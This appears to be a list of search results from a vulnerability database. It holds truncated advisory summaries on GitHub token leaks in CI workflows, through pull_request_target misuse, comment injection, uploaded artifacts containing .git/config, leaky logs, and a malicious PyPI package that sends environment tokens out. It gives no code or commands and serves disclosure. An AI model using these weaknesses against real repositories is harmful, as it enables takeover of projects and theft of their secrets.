181 matches found
PT-2025-24345 · Github Actions · Broadinstitute/Cromwell
Summary Using Issue comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB TOKEN which can be used to completely overtake the repo since the token has...
CVE-2024-35183
wolfictl is a command line tool for working with Wolfi. A git authentication issue in versions prior to 0.16.10 allows a local user’s GitHub token to be sent to remote servers other than github.com. Most git-dependent functionality in wolfictl relies on its own git package, which contains...
CVE-2021-32724
check-spelling is a github action which provides CI spell checking. In affected versions and for a repository with the check-spelling action enabled that triggers on pullrequesttarget or schedule, an attacker can send a crafted Pull Request that causes a GITHUBTOKEN to be exposed. With the...
CVE-2021-32638
Github's CodeQL action is provided to run CodeQL-based code scanning on non-GitHub CI/CD systems and requires a GitHub access token to connect to a GitHub repository. The runner and its documentation previously suggested passing the GitHub token as a command-line parameter to the process instead ...
CVE-2021-29642
GistPad before 0.2.7 allows a crafted workspace folder to change the URL for the Gist API, which leads to leakage of GitHub access tokens...
UBUNTU-CVE-2025-47928
Spotipy is a Python library for the Spotify Web API. As of commit 4f5759dbfb4506c7b6280572a4db1aabc1ac778d, using pullrequesttarget on .github/workflows/integrationtests.yml followed by the checking out the head.sha of a forked PR can be exploited by attackers, since untrusted code can be execute...
CVE-2025-47928 Spotipy repo vulnerable to secrets exfiltration via `pull_request_target`
Spotipy is a Python library for the Spotify Web API. As of commit 4f5759dbfb4506c7b6280572a4db1aabc1ac778d, using pullrequesttarget on .github/workflows/integrationtests.yml followed by the checking out the head.sha of a forked PR can be exploited by attackers, since untrusted code can be execute...
DOM 安全漏洞
DOM is a DOM interface open-sourced by PHP.GT. A security vulnerability exists in DOM versions prior to 4.1.8, which stems from the exposure of GITHUBTOKEN in the Dom workflow runtime product...
PT-2025-19986 · Phpgt/Dom · Phpgt/Dom
Name of the Vulnerable Software and Affected Versions: phpgt/Dom versions prior to 4.1.8 Description: The issue exposes the GITHUB TOKEN in the Dom workflow run artifact. This occurs because the ci.yml workflow file uses actions/upload-artifact@v4 to upload the build artifact, which is a zip of t...
CVE-2025-32958
Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file...
Adept 信息泄露漏洞
Adept is a programming language open-sourced by AdeptLanguage. An information disclosure vulnerability exists in versions prior to Adept a1a41b7, which stems from the remoteBuild.yml workflow file potentially disclosing GITHUBTOKEN, which could lead to the push of malicious code...
PT-2025-17465 · Adept · Adept
Name of the Vulnerable Software and Affected Versions: Adept versions prior to commit a1a41b7 Description: The issue concerns the exposure of the GITHUB TOKEN in the Adept language workflow. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the...
CVE-2025-32953
z80pack is a mature emulator of multiple platforms with 8080 and Z80 CPU. In version 1.38 and prior, the makefile-ubuntu.yml workflow file uses actions/upload-artifact@v4 to upload the z80pack-ubuntu artifact. This artifact is a zip of the current directory, which includes the automatically...
PT-2025-17346 · Z80Pack · Z80Pack
Name of the Vulnerable Software and Affected Versions: z80pack versions 1.38 and prior Description: The issue concerns the exposure of sensitive information, specifically the GITHUB TOKEN, in the workflow run artifact. This occurs because the makefile-ubuntu.yml workflow file uses...
z80pack 信息泄露漏洞
z80pack is a Zilog Z80 with Intel 8080 system emulation by the individual developer Udo Munk. An information disclosure vulnerability exists in z80pack version 1.38 and earlier, which stems from the makefile-ubuntu.yml workflow file potentially disclosing GITHUBTOKEN...
CVE-2025-31479 canonical/get-workflow-version-action can leak a partial GITHUB_TOKEN in exception output
canonical/get-workflow-version-action is a GitHub composite action to get commit SHA that GitHub Actions reusable workflow was called with. Prior to 1.0.1, if the get-workflow-version-action step fails, the exception output may include the GITHUBTOKEN. If the full token is included in the excepti...
get-workflow-version-action 日志信息泄露漏洞
get-workflow-version-action is a Canonical open source tool. A log information disclosure vulnerability exists in get-workflow-version-action versions prior to 1.0.1, which stems from the fact that the exception output may contain GITHUBTOKEN, which could lead to information disclosure...
MAL-2025-191738 Malicious code in getpublicip (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 041ba7130d1460fe6480d062c61c78db3b88cc5c6d060913d0501fdbdc7c35b0 If installed using source package, the package collects selected environment variables, including GITHUBTOKEN if set, and sends to an external service. The...
GHSA-VQF5-2XX6-9WFM GitHub PAT written to debug artifacts
Impact summary In some circumstances, debug artifacts uploaded by the CodeQL Action after a failed code scanning workflow run may contain the environment variables from the workflow run, including any secrets that were exposed as environment variables to the workflow. Users with read access to th...
CVE-2025-24362
CVE-2025-24362 concerns CodeQL Action when debug artifacts are enabled. In certain failed CodeQL analyses on Java/Kotlin repos, the uploaded debug artifacts could contain environment variables from the workflow run, including secrets such as the GITHUB_TOKEN. The token could be valid for the dura...